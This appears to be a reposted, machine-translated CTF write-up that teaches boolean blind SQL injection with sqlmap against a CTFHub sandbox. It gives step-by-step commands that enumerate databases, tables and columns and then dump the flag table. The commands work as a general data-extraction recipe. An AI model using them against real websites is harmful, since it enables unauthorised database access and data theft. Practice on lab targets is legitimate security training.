Boolean blind injection of sqlmap blasting

Others 2021-01-26 12:51:20 views: null

Boolean blind injection of sqlmap blasting

——————————————————————————— It
hasn’t been updated for a long time, and the sentence is almost forgotten…. As a rookie, I finally understood this question and the meaning of some sentences. I will express it in as detailed and understandable language as possible.

sqlmap blasting (first you have to download sqlmap, which happens to be in csdn)

Injection statement: python sqlmap.py -u"XXXXX" -batch is the basic injection framework.

1. The library name of the blasting database

Input: python sqlmap.py -u"http://challenge-cb6615ef28a95b3d.sandbox.ctfhub.com:10080/?id=1" -batch -dbs
Result:Insert picture description here

python sqlmap.py -u"XXX" -batch is the basic structure XXXX means to inject "-" into the URL to point to the data that needs to be blasted. "-Dbs" points to the database.

The figure shows the type of database searched:

2. Blasting the name of the table in the current database
Input: python sqlmap.py -u"http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -tables
Here "D" means the database, and "-tables" points to the name of the blasting table.
Result:Insert picture description here

Get the two table names flag and news.
3. Blasting column name
Input: python sqlmap.py -u"http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -T"flag" -columns
"-T" means table name, "-columns" points to blasting column name
Result:Insert picture description here

The data type obtained is varchar (VARCHAR(M) is a more flexible data type than CHAR. It is also used to represent character data, but VARCHAR can store a variable-length character string.) It is variable here because Here is that the flag in ctfhub is different every time and the flag is a character so it belongs to varchar.

4. Blast the data
input: python sqlmap.py -u"http://challenge-8400f0508f0ba587.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -T"flag" -C"flag" -dump
"C" is the column name, and "-dump" is the meaning of exporting data.
result:Insert picture description here

Successfully obtained the flag.

If you are not familiar with it, you can use this to blast SQL integer and character types.
You can also learn about manual injection, but it is a bit troublesome.

Guess you like

Origin blog.csdn.net/m0_52699073/article/details/113063496
Recommended
Domestic cloud input method - only Huawei has no cloud data upload security issues
Open Source Daily | Industrial open source project OGG 1.0; Sister, do you want to configure Firefox with me? Apple AI is far behind? Fedora 40
Ranking
Deploy Tomcat (Web) services Comments
jquery: event mechanism bind() on()
The simple and easy-to-understand basic encapsulation module makes Web testing easier!
Oracle Database on Linux solutions Chinese garbled
Talk about the REST API of Eureka Server
Instructions for companies applying for ISO certification
Spring mvc framework adds encryption/decryption of messages
Transport layer protocol-introduction of TCP protocol and the process of three-way handshake and four-time disconnection, and the difference with UDP protocol
MockMvc and Mockito - java.lang.AssertionError: JSON path "$" Expected: a collection with size <2> but: collection size was <0>
Redis cluster creation
Daily
More
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(31)
2024-04-16(23)
2024-04-15(5)

Code World

© 2018 codetd.com